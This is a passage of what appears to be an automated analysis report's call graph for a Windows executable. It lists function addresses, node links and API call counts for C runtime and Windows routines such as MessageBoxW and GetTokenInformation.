17172 7ff7f2502774 17170->17172 17175 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17170->17175 17171->17172 17173 7ff7f2502d06 17171->17173 17174 7ff7f2502d77 17171->17174 17172->17133 17176 7ff7f2502da1 17173->17176 17177 7ff7f2502d0c 17173->17177 17178 7ff7f2502dd0 17174->17178 17179 7ff7f2502d7c 17174->17179 17175->17172 17184 7ff7f2501074 38 API calls 17176->17184 17180 7ff7f2502d11 17177->17180 17181 7ff7f2502d40 17177->17181 17185 7ff7f2502de7 17178->17185 17187 7ff7f2502dda 17178->17187 17191 7ff7f2502ddf 17178->17191 17182 7ff7f2502db1 17179->17182 17183 7ff7f2502d7e 17179->17183 17180->17185 17188 7ff7f2502d17 17180->17188 17181->17188 17181->17191 17189 7ff7f2500c64 38 API calls 17182->17189 17186 7ff7f2502d20 17183->17186 17195 7ff7f2502d8d 17183->17195 17201 7ff7f2502d3b 17184->17201 17192 7ff7f25039cc 45 API calls 17185->17192 17190 7ff7f2503478 47 API calls 17186->17190 17205 7ff7f2502e10 17186->17205 17187->17176 17187->17191 17188->17186 17193 7ff7f2502d52 17188->17193 17188->17201 17189->17201 17190->17201 17194 7ff7f2501484 38 API calls 17191->17194 17191->17205 17192->17201 17196 7ff7f25037b4 46 API calls 17193->17196 17193->17205 17194->17201 17195->17176 17197 7ff7f2502d92 17195->17197 17196->17201 17200 7ff7f2503878 37 API calls 17197->17200 17197->17205 17198 7ff7f24fb870 _log10_special 8 API calls 17199 7ff7f250310a 17198->17199 17199->17133 17200->17201 17202 7ff7f2503ae0 45 API calls 17201->17202 17204 7ff7f2502ffc 17201->17204 17201->17205 17202->17204 17203 7ff7f250dd18 46 API calls 17203->17204 17204->17203 17204->17205 17205->17198 17426 7ff7f25002e8 17206->17426 17210 7ff7f250349e 17209->17210 17272 7ff7f24ffea0 17210->17272 17215 7ff7f2503ae0 45 API calls 17216 7ff7f25035e3 17215->17216 17217 7ff7f2503ae0 45 API calls 17216->17217 17218 7ff7f2503671 17216->17218 17217->17218 17218->17165 17220 7ff7f25037e9 17219->17220 17221 7ff7f250382e 17220->17221 17222 7ff7f2503807 17220->17222 17223 7ff7f2503ae0 45 API calls 17220->17223 17221->17165 17224 7ff7f250dd18 46 API calls 17222->17224 17223->17222 17224->17221 17227 7ff7f2503899 17225->17227 17226 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17228 7ff7f25038ca 17226->17228 17227->17226 17227->17228 17228->17165 17230 7ff7f25010a7 17229->17230 17231 7ff7f25010d6 17230->17231 17233 7ff7f2501193 17230->17233 17235 7ff7f2501113 17231->17235 17399 7ff7f24fff48 17231->17399 17234 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17233->17234 17234->17235 17235->17165 17237 7ff7f2500c97 17236->17237 17238 7ff7f2500cc6 17237->17238 17240 7ff7f2500d83 17237->17240 17239 7ff7f24fff48 12 API calls 17238->17239 17242 7ff7f2500d03 17238->17242 17239->17242 17241 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17240->17241 17241->17242 17242->17165 17244 7ff7f2503a0f 17243->17244 17246 7ff7f2503a13 __crtLCMapStringW 17244->17246 17407 7ff7f2503a68 17244->17407 17246->17165 17248 7ff7f25014b7 17247->17248 17249 7ff7f25014e6 17248->17249 17251 7ff7f25015a3 17248->17251 17250 7ff7f24fff48 12 API calls 17249->17250 17253 7ff7f2501523 17249->17253 17250->17253 17252 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17251->17252 17252->17253 17253->17165 17255 7ff7f2503af7 17254->17255 17411 7ff7f250ccc8 17255->17411 17261 7ff7f250dd49 17260->17261 17270 7ff7f250dd57 17260->17270 17262 7ff7f250dd77 17261->17262 17265 7ff7f2503ae0 45 API calls 17261->17265 17261->17270 17263 7ff7f250dd88 17262->17263 17264 7ff7f250ddaf 17262->17264 17419 7ff7f250f3b0 17263->17419 17267 7ff7f250ddd9 17264->17267 17268 7ff7f250de3a 17264->17268 17264->17270 17265->17262 17267->17270 17271 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 17267->17271 17269 7ff7f250ebb0 _fread_nolock MultiByteToWideChar 17268->17269 17269->17270 17270->17168 17271->17270 17273 7ff7f24ffed7 17272->17273 17274 7ff7f24ffec6 17272->17274 17273->17274 17275 7ff7f250c90c _fread_nolock 12 API calls 17273->17275 17280 7ff7f250d880 17274->17280 17276 7ff7f24fff04 17275->17276 17277 7ff7f24fff18 17276->17277 17278 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17276->17278 17279 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17277->17279 17278->17277 17279->17274 17281 7ff7f250d89d 17280->17281 17282 7ff7f250d8d0 17280->17282 17283 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17281->17283 17282->17281 17284 7ff7f250d902 17282->17284 17293 7ff7f25035c1 17283->17293 17289 7ff7f250da15 17284->17289 17297 7ff7f250d94a 17284->17297 17285 7ff7f250db07 17326 7ff7f250cd6c 17285->17326 17287 7ff7f250dacd 17319 7ff7f250d104 17287->17319 17289->17285 17289->17287 17290 7ff7f250da9c 17289->17290 17292 7ff7f250da5f 17289->17292 17295 7ff7f250da55 17289->17295 17312 7ff7f250d3e4 17290->17312 17302 7ff7f250d614 17292->17302 17293->17215 17293->17216 17295->17287 17296 7ff7f250da5a 17295->17296 17296->17290 17296->17292 17297->17293 17298 7ff7f25097b4 __std_exception_copy 37 API calls 17297->17298 17299 7ff7f250da02 17298->17299 17299->17293 17300 7ff7f2509c10 _isindst 17 API calls 17299->17300 17301 7ff7f250db64 17300->17301 17335 7ff7f25133bc 17302->17335 17306 7ff7f250d711 17388 7ff7f250d200 17306->17388 17307 7ff7f250d6bc 17307->17306 17309 7ff7f250d6dc 17307->17309 17311 7ff7f250d6c0 17307->17311 17384 7ff7f250d4bc 17309->17384 17311->17293 17313 7ff7f25133bc 38 API calls 17312->17313 17314 7ff7f250d42e 17313->17314 17315 7ff7f2512e04 37 API calls 17314->17315 17316 7ff7f250d47e 17315->17316 17317 7ff7f250d482 17316->17317 17318 7ff7f250d4bc 45 API calls 17316->17318 17317->17293 17318->17317 17320 7ff7f25133bc 38 API calls 17319->17320 17321 7ff7f250d14f 17320->17321 17322 7ff7f2512e04 37 API calls 17321->17322 17324 7ff7f250d1a7 17322->17324 17323 7ff7f250d1ab 17323->17293 17324->17323 17325 7ff7f250d200 45 API calls 17324->17325 17325->17323 17327 7ff7f250cdb1 17326->17327 17328 7ff7f250cde4 17326->17328 17330 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17327->17330 17329 7ff7f250cdfc 17328->17329 17333 7ff7f250ce7d 17328->17333 17331 7ff7f250d104 46 API calls 17329->17331 17332 7ff7f250cddd memcpy_s 17330->17332 17331->17332 17332->17293 17333->17332 17334 7ff7f2503ae0 45 API calls 17333->17334 17334->17332 17336 7ff7f251340f fegetenv 17335->17336 17337 7ff7f251713c 37 API calls 17336->17337 17341 7ff7f2513462 17337->17341 17338 7ff7f251348f 17343 7ff7f25097b4 __std_exception_copy 37 API calls 17338->17343 17339 7ff7f2513552 17340 7ff7f251713c 37 API calls 17339->17340 17342 7ff7f251357c 17340->17342 17341->17339 17345 7ff7f251347d 17341->17345 17346 7ff7f251352c 17341->17346 17347 7ff7f251713c 37 API calls 17342->17347 17344 7ff7f251350d 17343->17344 17348 7ff7f2514634 17344->17348 17354 7ff7f2513515 17344->17354 17345->17338 17345->17339 17349 7ff7f25097b4 __std_exception_copy 37 API calls 17346->17349 17350 7ff7f251358d 17347->17350 17351 7ff7f2509c10 _isindst 17 API calls 17348->17351 17349->17344 17352 7ff7f2517330 20 API calls 17350->17352 17353 7ff7f2514649 17351->17353 17362 7ff7f25135f6 memcpy_s 17352->17362 17355 7ff7f24fb870 _log10_special 8 API calls 17354->17355 17356 7ff7f250d661 17355->17356 17380 7ff7f2512e04 17356->17380 17357 7ff7f251399f memcpy_s 17358 7ff7f2513637 memcpy_s 17375 7ff7f2513f7b memcpy_s 17358->17375 17376 7ff7f2513a93 memcpy_s 17358->17376 17359 7ff7f2513cdf 17360 7ff7f2512f20 37 API calls 17359->17360 17366 7ff7f25143f7 17360->17366 17361 7ff7f2513c8b 17361->17359 17363 7ff7f251464c memcpy_s 37 API calls 17361->17363 17362->17357 17362->17358 17364 7ff7f25043f4 memcpy_s 11 API calls 17362->17364 17363->17359 17365 7ff7f2513a70 17364->17365 17367 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17365->17367 17369 7ff7f251464c memcpy_s 37 API calls 17366->17369 17377 7ff7f2514452 17366->17377 17367->17358 17368 7ff7f25145d8 17371 7ff7f251713c 37 API calls 17368->17371 17369->17377 17370 7ff7f25043f4 11 API calls memcpy_s 17370->17375 17371->17354 17372 7ff7f25043f4 11 API calls memcpy_s 17372->17376 17373 7ff7f2512f20 37 API calls 17373->17377 17374 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 17374->17376 17375->17359 17375->17361 17375->17370 17378 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 17375->17378 17376->17361 17376->17372 17376->17374 17377->17368 17377->17373 17379 7ff7f251464c memcpy_s 37 API calls 17377->17379 17378->17375 17379->17377 17381 7ff7f2512e23 17380->17381 17382 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17381->17382 17383 7ff7f2512e4e memcpy_s 17381->17383 17382->17383 17383->17307 17385 7ff7f250d4e8 memcpy_s 17384->17385 17386 7ff7f2503ae0 45 API calls 17385->17386 17387 7ff7f250d5a2 memcpy_s 17385->17387 17386->17387 17387->17311 17389 7ff7f250d23b 17388->17389 17393 7ff7f250d288 memcpy_s 17388->17393 17390 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17389->17390 17391 7ff7f250d267 17390->17391 17391->17311 17392 7ff7f250d2f3 17394 7ff7f25097b4 __std_exception_copy 37 API calls 17392->17394 17393->17392 17395 7ff7f2503ae0 45 API calls 17393->17395 17398 7ff7f250d335 memcpy_s 17394->17398 17395->17392 17396 7ff7f2509c10 _isindst 17 API calls 17397 7ff7f250d3e0 17396->17397 17398->17396 17400 7ff7f24fff7f 17399->17400 17401 7ff7f24fff6e 17399->17401 17400->17401 17402 7ff7f250c90c _fread_nolock 12 API calls 17400->17402 17401->17235 17403 7ff7f24fffb0 17402->17403 17404 7ff7f24fffc4 17403->17404 17406 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17403->17406 17405 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17404->17405 17405->17401 17406->17404 17408 7ff7f2503a86 17407->17408 17409 7ff7f2503a8e 17407->17409 17410 7ff7f2503ae0 45 API calls 17408->17410 17409->17246 17410->17409 17412 7ff7f250cce1 17411->17412 17414 7ff7f2503b1f 17411->17414 17413 7ff7f2512614 45 API calls 17412->17413 17412->17414 17413->17414 17415 7ff7f250cd34 17414->17415 17416 7ff7f250cd4d 17415->17416 17417 7ff7f2503b2f 17415->17417 17416->17417 17418 7ff7f2511960 45 API calls 17416->17418 17417->17168 17418->17417 17422 7ff7f2516098 17419->17422 17425 7ff7f25160fc 17422->17425 17423 7ff7f24fb870 _log10_special 8 API calls 17424 7ff7f250f3cd 17423->17424 17424->17270 17425->17423 17427 7ff7f250032f 17426->17427 17428 7ff7f250031d 17426->17428 17431 7ff7f250033d 17427->17431 17436 7ff7f2500379 17427->17436 17429 7ff7f25043f4 memcpy_s 11 API calls 17428->17429 17430 7ff7f2500322 17429->17430 17432 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17430->17432 17433 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17431->17433 17434 7ff7f250032d 17432->17434 17433->17434 17434->17133 17435 7ff7f25006f5 17435->17434 17437 7ff7f25043f4 memcpy_s 11 API calls 17435->17437 17436->17435 17438 7ff7f25043f4 memcpy_s 11 API calls 17436->17438 17439 7ff7f2500989 17437->17439 17440 7ff7f25006ea 17438->17440 17441 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17439->17441 17442 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17440->17442 17441->17434 17442->17435 17444 7ff7f24ffa24 17443->17444 17473 7ff7f24ff784 17444->17473 17446 7ff7f24ffa3d 17446->16808 17485 7ff7f24ff6dc 17447->17485 17451 7ff7f24f277c 17450->17451 17452 7ff7f25043f4 memcpy_s 11 API calls 17451->17452 17453 7ff7f24f2799 17452->17453 17499 7ff7f2503ca4 17453->17499 17458 7ff7f24f1bf0 49 API calls 17459 7ff7f24f2807 17458->17459 17460 7ff7f24f86b0 2 API calls 17459->17460 17461 7ff7f24f281f 17460->17461 17462 7ff7f24f2843 MessageBoxA 17461->17462 17463 7ff7f24f282c MessageBoxW 17461->17463 17464 7ff7f24f2855 17462->17464 17463->17464 17465 7ff7f24fb870 _log10_special 8 API calls 17464->17465 17466 7ff7f24f2865 17465->17466 17466->16837 17468 7ff7f24ff439 17467->17468 17472 7ff7f24f1b06 17467->17472 17469 7ff7f25043f4 memcpy_s 11 API calls 17468->17469 17470 7ff7f24ff43e 17469->17470 17471 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17470->17471 17471->17472 17472->16836 17472->16837 17474 7ff7f24ff7ee 17473->17474 17475 7ff7f24ff7ae 17473->17475 17474->17475 17477 7ff7f24ff7fa 17474->17477 17476 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17475->17476 17483 7ff7f24ff7d5 17476->17483 17484 7ff7f250477c EnterCriticalSection 17477->17484 17483->17446 17486 7ff7f24ff706 17485->17486 17487 7ff7f24f19b9 17485->17487 17486->17487 17488 7ff7f24ff715 memcpy_s 17486->17488 17489 7ff7f24ff752 17486->17489 17487->16814 17487->16815 17491 7ff7f25043f4 memcpy_s 11 API calls 17488->17491 17498 7ff7f250477c EnterCriticalSection 17489->17498 17493 7ff7f24ff72a 17491->17493 17495 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17493->17495 17495->17487 17503 7ff7f2503cfe 17499->17503 17500 7ff7f2503d23 17501 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17500->17501 17505 7ff7f2503d4d 17501->17505 17502 7ff7f2503d5f 17529 7ff7f2501f30 17502->17529 17503->17500 17503->17502 17508 7ff7f24fb870 _log10_special 8 API calls 17505->17508 17506 7ff7f2503e3c 17507 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17506->17507 17507->17505 17509 7ff7f24f27d8 17508->17509 17517 7ff7f2504480 17509->17517 17511 7ff7f2503e11 17513 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17511->17513 17512 7ff7f2503e60 17512->17506 17515 7ff7f2503e6a 17512->17515 17513->17505 17514 7ff7f2503e08 17514->17506 17514->17511 17516 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17515->17516 17516->17505 17518 7ff7f250a5d8 memcpy_s 11 API calls 17517->17518 17519 7ff7f2504497 17518->17519 17520 7ff7f24f27df 17519->17520 17521 7ff7f250dea8 memcpy_s 11 API calls 17519->17521 17524 7ff7f25044d7 17519->17524 17520->17458 17522 7ff7f25044cc 17521->17522 17523 7ff7f2509c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17522->17523 17523->17524 17524->17520 17664 7ff7f250df30 17524->17664 17527 7ff7f2509c10 _isindst 17 API calls 17528 7ff7f250451c 17527->17528 17530 7ff7f2501f6e 17529->17530 17531 7ff7f2501f5e 17529->17531 17532 7ff7f2501f77 17530->17532 17541 7ff7f2501fa5 17530->17541 17533 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17531->17533 17534 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17532->17534 17535 7ff7f2501f9d 17533->17535 17534->17535 17535->17506 17535->17511 17535->17512 17535->17514 17536 7ff7f2503ae0 45 API calls 17536->17541 17538 7ff7f2502254 17540 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17538->17540 17540->17531 17541->17531 17541->17535 17541->17536 17541->17538 17543 7ff7f25028c0 17541->17543 17569 7ff7f2502588 17541->17569 17599 7ff7f2501e10 17541->17599 17544 7ff7f2502975 17543->17544 17545 7ff7f2502902 17543->17545 17548 7ff7f25029cf 17544->17548 17549 7ff7f250297a 17544->17549 17546 7ff7f250299f 17545->17546 17547 7ff7f2502908 17545->17547 17616 7ff7f2500e70 17546->17616 17555 7ff7f250290d 17547->17555 17558 7ff7f25029de 17547->17558 17548->17546 17548->17558 17560 7ff7f2502938 17548->17560 17550 7ff7f25029af 17549->17550 17551 7ff7f250297c 17549->17551 17623 7ff7f2500a60 17550->17623 17553 7ff7f250291d 17551->17553 17557 7ff7f250298b 17551->17557 17568 7ff7f2502a0d 17553->17568 17602 7ff7f2503224 17553->17602 17555->17553 17559 7ff7f2502950 17555->17559 17555->17560 17557->17546 17562 7ff7f2502990 17557->17562 17558->17568 17630 7ff7f2501280 17558->17630 17559->17568 17612 7ff7f25036e0 17559->17612 17560->17568 17637 7ff7f250db68 17560->17637 17565 7ff7f2503878 37 API calls 17562->17565 17562->17568 17564 7ff7f24fb870 _log10_special 8 API calls 17566 7ff7f2502ca3 17564->17566 17565->17560 17566->17541 17568->17564 17570 7ff7f2502593 17569->17570 17571 7ff7f25025a9 17569->17571 17572 7ff7f25025e7 17570->17572 17573 7ff7f2502975 17570->17573 17574 7ff7f2502902 17570->17574 17571->17572 17575 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17571->17575 17572->17541 17578 7ff7f25029cf 17573->17578 17579 7ff7f250297a 17573->17579 17576 7ff7f250299f 17574->17576 17577 7ff7f2502908 17574->17577 17575->17572 17582 7ff7f2500e70 38 API calls 17576->17582 17586 7ff7f250290d 17577->17586 17589 7ff7f25029de 17577->17589 17578->17576 17578->17589 17597 7ff7f2502938 17578->17597 17580 7ff7f25029af 17579->17580 17581 7ff7f250297c 17579->17581 17584 7ff7f2500a60 38 API calls 17580->17584 17583 7ff7f250291d 17581->17583 17587 7ff7f250298b 17581->17587 17582->17597 17585 7ff7f2503224 47 API calls 17583->17585 17598 7ff7f2502a0d 17583->17598 17584->17597 17585->17597 17586->17583 17588 7ff7f2502950 17586->17588 17586->17597 17587->17576 17591 7ff7f2502990 17587->17591 17592 7ff7f25036e0 47 API calls 17588->17592 17588->17598 17590 7ff7f2501280 38 API calls 17589->17590 17589->17598 17590->17597 17594 7ff7f2503878 37 API calls 17591->17594 17591->17598 17592->17597 17593 7ff7f24fb870 _log10_special 8 API calls 17595 7ff7f2502ca3 17593->17595 17594->17597 17595->17541 17596 7ff7f250db68 47 API calls 17596->17597 17597->17596 17597->17598 17598->17593 17647 7ff7f2500034 17599->17647 17603 7ff7f2503246 17602->17603 17604 7ff7f24ffea0 12 API calls 17603->17604 17605 7ff7f250328e 17604->17605 17606 7ff7f250d880 46 API calls 17605->17606 17607 7ff7f2503361 17606->17607 17608 7ff7f2503383 17607->17608 17609 7ff7f2503ae0 45 API calls 17607->17609 17610 7ff7f2503ae0 45 API calls 17608->17610 17611 7ff7f250340c 17608->17611 17609->17608 17610->17611 17611->17560 17613 7ff7f25036f8 17612->17613 17615 7ff7f2503760 17612->17615 17614 7ff7f250db68 47 API calls 17613->17614 17613->17615 17614->17615 17615->17560 17618 7ff7f2500ea3 17616->17618 17617 7ff7f2500ed2 17619 7ff7f24ffea0 12 API calls 17617->17619 17622 7ff7f2500f0f 17617->17622 17618->17617 17620 7ff7f2500f8f 17618->17620 17619->17622 17621 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17620->17621 17621->17622 17622->17560 17624 7ff7f2500a93 17623->17624 17625 7ff7f2500ac2 17624->17625 17627 7ff7f2500b7f 17624->17627 17626 7ff7f24ffea0 12 API calls 17625->17626 17629 7ff7f2500aff 17625->17629 17626->17629 17628 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17627->17628 17628->17629 17629->17560 17631 7ff7f25012b3 17630->17631 17632 7ff7f25012e2 17631->17632 17635 7ff7f250139f 17631->17635 17633 7ff7f250131f 17632->17633 17634 7ff7f24ffea0 12 API calls 17632->17634 17633->17560 17634->17633 17636 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17635->17636 17636->17633 17638 7ff7f250db90 17637->17638 17639 7ff7f250dbd5 17638->17639 17640 7ff7f2503ae0 45 API calls 17638->17640 17642 7ff7f250db95 memcpy_s 17638->17642 17646 7ff7f250dbbe memcpy_s 17638->17646 17639->17642 17643 7ff7f250faf8 WideCharToMultiByte 17639->17643 17639->17646 17640->17639 17641 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17641->17642 17642->17560 17644 7ff7f250dcb1 17643->17644 17644->17642 17645 7ff7f250dcc6 GetLastError 17644->17645 17645->17642 17645->17646 17646->17641 17646->17642 17648 7ff7f2500073 17647->17648 17649 7ff7f2500061 17647->17649 17651 7ff7f2500080 17648->17651 17655 7ff7f25000bd 17648->17655 17650 7ff7f25043f4 memcpy_s 11 API calls 17649->17650 17652 7ff7f2500066 17650->17652 17653 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 17651->17653 17654 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17652->17654 17659 7ff7f2500071 17653->17659 17654->17659 17656 7ff7f2500166 17655->17656 17657 7ff7f25043f4 memcpy_s 11 API calls 17655->17657 17658 7ff7f25043f4 memcpy_s 11 API calls 17656->17658 17656->17659 17660 7ff7f250015b 17657->17660 17661 7ff7f2500210 17658->17661 17659->17541 17662 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17660->17662 17663 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17661->17663 17662->17656 17663->17659 17669 7ff7f250df4d 17664->17669 17665 7ff7f250df52 17666 7ff7f25044fd 17665->17666 17667 7ff7f25043f4 memcpy_s 11 API calls 17665->17667 17666->17520 17666->17527 17668 7ff7f250df5c 17667->17668 17670 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17668->17670 17669->17665 17669->17666 17671 7ff7f250df9c 17669->17671 17670->17666 17671->17666 17672 7ff7f25043f4 memcpy_s 11 API calls 17671->17672 17672->17668 17674 7ff7f2507555 17673->17674 17675 7ff7f2507568 17673->17675 17676 7ff7f25043f4 memcpy_s 11 API calls 17674->17676 17683 7ff7f25071cc 17675->17683 17678 7ff7f250755a 17676->17678 17680 7ff7f2509bf0 _invalid_parameter_noinfo 37 API calls 17678->17680 17682 7ff7f2507566 17680->17682 17682->16855 17690 7ff7f250f5e8 EnterCriticalSection 17683->17690 17692 7ff7f24f7c13 __vcrt_freefls 17691->17692 17693 7ff7f24f7b91 GetTokenInformation 17691->17693 17695 7ff7f24f7c26 CloseHandle 17692->17695 17696 7ff7f24f7c2c 17692->17696 17694 7ff7f24f7bb2 GetLastError 17693->17694 17697 7ff7f24f7bbd 17693->17697 17694->17692 17694->17697 17695->17696 17696->16864 17697->17692 17698 7ff7f24f7bd9 GetTokenInformation 17697->17698 17698->17692 17699 7ff7f24f7bfc 17698->17699 17699->17692 17700 7ff7f24f7c06 ConvertSidToStringSidW 17699->17700 17700->17692 17702 7ff7f24f297a 17701->17702 17703 7ff7f2503ef8 48 API calls 17702->17703 17704 7ff7f24f29a2 MessageBoxW 17703->17704 17705 7ff7f24fb870 _log10_special 8 API calls 17704->17705 17706 7ff7f24f29cc 17705->17706 17706->16874 17708 7ff7f24f2555 17707->17708 17709 7ff7f2503ef8 48 API calls 17708->17709 17715 7ff7f24f77dc 17714->17715 17981 7ff7f24f3f70 108 API calls 17980->17981 17982 7ff7f24f1463 17981->17982 17983 7ff7f24f146b 17982->17983 17984 7ff7f24f148c 17982->17984 17985 7ff7f24f25f0 53 API calls 17983->17985 17986 7ff7f24ff9f4 73 API calls 17984->17986 17988 7ff7f24f147b 17985->17988 17987 7ff7f24f14a1 17986->17987 17989 7ff7f24f14a5 17987->17989 17990 7ff7f24f14c1 17987->17990 17988->16924 17991 7ff7f24f2760 53 API calls 17989->17991 17992 7ff7f24f14f1 17990->17992 17993 7ff7f24f14d1 17990->17993 18002 7ff7f24f14bc __vcrt_freefls 17991->18002 17996 7ff7f24f14f7 17992->17996 17999 7ff7f24f150a 17992->17999 17994 7ff7f24f2760 53 API calls 17993->17994 17994->18002 17995 7ff7f24ff36c 74 API calls 17997 7ff7f24f1584 17995->17997 18004 7ff7f24f11f0 17996->18004 17997->16924 18000 7ff7f24ff6bc _fread_nolock 53 API calls 17999->18000 18001 7ff7f24f1596 17999->18001 17999->18002 18000->17999 18003 7ff7f24f2760 53 API calls 18001->18003 18002->17995 18003->18002 18005 7ff7f24f1248 18004->18005 18006 7ff7f24f124f 18005->18006 18007 7ff7f24f1277 18005->18007 18008 7ff7f24f25f0 53 API calls 18006->18008 18010 7ff7f24f1291 18007->18010 18011 7ff7f24f12ad 18007->18011 18009 7ff7f24f1262 18008->18009 18009->18002 18012 7ff7f24f2760 53 API calls 18010->18012 18013 7ff7f24f12bf 18011->18013 18021 7ff7f24f12db memcpy_s 18011->18021 18017 7ff7f24f12a8 __vcrt_freefls 18012->18017 18014 7ff7f24f2760 53 API calls 18013->18014 18014->18017 18015 7ff7f24ff6bc _fread_nolock 53 API calls 18015->18021 18016 7ff7f24ff430 37 API calls 18016->18021 18017->18002 18018 7ff7f24f139f 18019 7ff7f24f25f0 53 API calls 18018->18019 18019->18017 18021->18015 18021->18016 18021->18017 18021->18018 18022 7ff7f24ffdfc 18021->18022 18023 7ff7f24ffe2c 18022->18023 18026 7ff7f24ffb4c 18023->18026 18025 7ff7f24ffe4a 18025->18021 18027 7ff7f24ffb6c 18026->18027 18028 7ff7f24ffb99 18026->18028 18027->18028 18029 7ff7f24ffb76 18027->18029 18030 7ff7f24ffba1 18027->18030 18028->18025 18032 7ff7f2509b24 _invalid_parameter_noinfo 37 API calls 18029->18032 18033 7ff7f24ffa8c 18030->18033 18032->18028 18040 7ff7f250477c EnterCriticalSection 18033->18040 18042 7ff7f24f3f1a 18041->18042 18043 7ff7f24f86b0 2 API calls 18042->18043 18044 7ff7f24f3f3f 18043->18044 18045 7ff7f24fb870 _log10_special 8 API calls 18044->18045 18046 7ff7f24f3f67 18045->18046 18046->16946 18048 7ff7f24f753e 18047->18048 18049 7ff7f24f1bf0 49 API calls 18048->18049 18052 7ff7f24f7662 18048->18052 18056 7ff7f24f75c5 18049->18056 18050 7ff7f24fb870 _log10_special 8 API calls 18051 7ff7f24f7693 18050->18051 18051->16946 18052->18050 18053 7ff7f24f1bf0 49 API calls 18053->18056 18054 7ff7f24f3f10 10 API calls 18054->18056 18055 7ff7f24f761b 18057 7ff7f24f86b0 2 API calls 18055->18057 18056->18052 18056->18053 18056->18054 18056->18055 18058 7ff7f24f7633 CreateDirectoryW 18057->18058 18058->18052 18058->18056 18060 7ff7f24f15d3 18059->18060 18061 7ff7f24f15f7 18059->18061 18148 7ff7f24f1050 18060->18148 18063 7ff7f24f3f70 108 API calls 18061->18063 18065 7ff7f24f160b 18063->18065 18064 7ff7f24f15d8 18066 7ff7f24f15ee 18064->18066 18069 7ff7f24f25f0 53 API calls 18064->18069 18067 7ff7f24f1613 18065->18067 18068 7ff7f24f163b 18065->18068 18066->16946 18070 7ff7f24f2760 53 API calls 18067->18070 18071 7ff7f24f3f70 108 API calls 18068->18071 18069->18066 18073 7ff7f24f162a 18070->18073 18072 7ff7f24f164f 18071->18072 18074 7ff7f24f1671 18072->18074 18075 7ff7f24f1657 18072->18075 18073->16946 18077 7ff7f24ff9f4 73 API calls 18074->18077 18076 7ff7f24f25f0 53 API calls 18075->18076 18078 7ff7f24f1667 18076->18078 18079 7ff7f24f1686 18077->18079 18083 7ff7f24ff36c 74 API calls 18078->18083 18080 7ff7f24f16ab 18079->18080 18081 7ff7f24f168a 18079->18081 18084 7ff7f24f16b1 18080->18084 18085 7ff7f24f16c9 18080->18085 18082 7ff7f24f2760 53 API calls 18081->18082 18086 7ff7f24f16a1 __vcrt_freefls 18082->18086 18087 7ff7f24f17cd 18083->18087 18088 7ff7f24f11f0 92 API calls 18084->18088 18089 7ff7f24f16eb 18085->18089 18096 7ff7f24f170c 18085->18096 18090 7ff7f24ff36c 74 API calls 18086->18090 18087->16946 18088->18086 18091 7ff7f24f2760 53 API calls 18089->18091 18090->18078 18091->18086 18092 7ff7f24ff6bc _fread_nolock 53 API calls 18092->18096 18093 7ff7f24f1775 18095 7ff7f24f2760 53 API calls 18093->18095 18094 7ff7f24ffdfc 76 API calls 18094->18096 18095->18086 18096->18086 18096->18092 18096->18093 18096->18094 18098 7ff7f24f6904 18097->18098 18099 7ff7f24f694b 18097->18099 18098->18099 18187 7ff7f2504250 18098->18187 18099->16946 18102 7ff7f24f3b51 18101->18102 18103 7ff7f24f3e90 49 API calls 18102->18103 18104 7ff7f24f3b8b 18103->18104 18105 7ff7f24f3e90 49 API calls 18104->18105 18106 7ff7f24f3b9b 18105->18106 18107 7ff7f24f3bbd 18106->18107 18108 7ff7f24f3bec 18106->18108 18202 7ff7f24f3ac0 18107->18202 18109 7ff7f24f3ac0 51 API calls 18108->18109 18111 7ff7f24f3bea 18109->18111 18112 7ff7f24f3c4c 18111->18112 18113 7ff7f24f3c17 18111->18113 18115 7ff7f24f3ac0 51 API calls 18112->18115 18209 7ff7f24f7400 18113->18209 18117 7ff7f24f3c70 18115->18117 18120 7ff7f24f3cc2 18117->18120 18122 7ff7f24f3ac0 51 API calls 18117->18122 18118 7ff7f24f3c47 18124 7ff7f24fb870 _log10_special 8 API calls 18118->18124 18119 7ff7f24f3d43 18123 7ff7f24f18f0 115 API calls 18119->18123 18120->18119 18132 7ff7f24f3d3c 